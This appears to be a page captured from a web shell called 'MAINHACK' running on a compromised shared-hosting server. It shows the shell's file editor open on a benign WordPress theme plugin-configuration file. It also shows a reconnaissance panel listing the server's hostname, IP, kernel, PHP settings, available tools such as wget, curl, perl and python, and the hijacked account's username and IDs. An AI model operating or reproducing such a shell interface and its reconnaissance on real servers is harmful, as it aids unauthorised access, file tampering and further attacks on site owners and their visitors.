[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: tgm-config.php
<?php /** * @author RadiusTheme * @since 1.0 * @version 1.0 */ namespace radiustheme\koncrete; class TGM_Config { public $theme_prefix; public $path; public function __construct() { $this->theme_prefix = Constants::$theme_prefix; $this->path = Constants::$theme_plugins_bundle_dir; add_action('tgmpa_register', array( $this, 'register_required_plugins' )); } public function register_required_plugins() { $plugins = array( // Bundled array( 'name' => 'Koncrete Core', 'slug' => 'koncrete-core', 'source' => 'koncrete-core.zip', 'required' => true, 'version' => '1.5.9' ), array( 'name' => 'RT Framework', 'slug' => 'rt-framework', 'source' => 'rt-framework.zip', 'required' => true, 'version' => '2.8' ), array( 'name' => 'RT Demo Importer', 'slug' => 'rt-demo-importer', 'source' => 'rt-demo-importer.zip', 'required' => false, 'version' => '4.3' ), array( 'name' => 'LayerSlider WP', 'slug' => 'LayerSlider', 'source' => 'LayerSlider.zip', 'required' => false, 'external_url' => 'https://layerslider.kreaturamedia.com', 'version' => '7.2.5' ), // Repository array( 'name' => 'Redux Framework', 'slug' => 'redux-framework', 'required' => true, ), array( 'name' => 'Elementor Page Builder', 'slug' => 'elementor', 'required' => true, ), array( 'name' => 'Contact Form 7', 'slug' => 'contact-form-7', 'required' => false, ), // plugin for e-commerce array( 'name' => 'WooCommerce', 'slug' => 'woocommerce', 'required' => false, ), array( 'name' => 'YITH WooCommerce Quick View', 'slug' => 'yith-woocommerce-quick-view', 'required' => false, ), array( 'name' => 'YITH WooCommerce Wishlist', 'slug' => 'yith-woocommerce-wishlist', 'required' => false, ), array( 'name' => 'YITH WooCommerce Compare', 'slug' => 'yith-woocommerce-compare', 'required' => false, ), ); $config = array( 'id' => $this->theme_prefix, // Unique ID for hashing notices for multiple instances of TGMPA. 'default_path' => $this->path, // Default absolute path to bundled plugins. 'menu' => $this->theme_prefix . '-install-plugins', // Menu slug. 'has_notices' => true, // Show admin notices or not. 'dismissable' => true, // If false, a user cannot dismiss the nag message. 'dismiss_msg' => '', // If 'dismissable' is false, this message will be output at top of nag. 'is_automatic' => false, // Automatically activate plugins after installation or not. 'message' => '', // Message to output right before the plugins table. ); tgmpa($plugins, $config); } } new TGM_Config;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium264.web-hosting.com
Server IP: 69.57.162.13
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 73.69 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kidscntx
User ID (UID): 1154
Group ID (GID): 1112
Script Owner UID: 1154
Current Dir Owner: 1154